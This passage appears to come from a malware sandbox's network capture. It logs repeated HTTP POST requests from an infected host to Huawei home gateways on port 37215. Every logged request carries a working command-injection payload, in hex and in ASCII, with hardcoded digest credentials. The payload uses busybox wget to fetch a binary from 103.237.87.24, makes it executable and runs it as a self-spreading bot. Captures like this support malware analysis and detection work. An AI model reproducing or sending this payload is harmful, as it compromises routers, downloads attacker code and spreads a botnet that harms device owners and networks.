2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2340192.168.2.1348498197.77.189.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623716116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2341192.168.2.134438041.30.89.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623732090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2342192.168.2.1342540197.42.30.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623792887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2343192.168.2.134011241.176.215.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623792887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2344192.168.2.1333640157.8.150.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623831034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2345192.168.2.135974441.87.179.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623842001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2346192.168.2.1341284157.173.206.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623867989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2347192.168.2.135656851.201.58.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623898983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2348192.168.2.133752841.5.218.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623904943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2349192.168.2.1335776197.125.213.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.623929024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2350192.168.2.1334860197.126.77.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624079943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
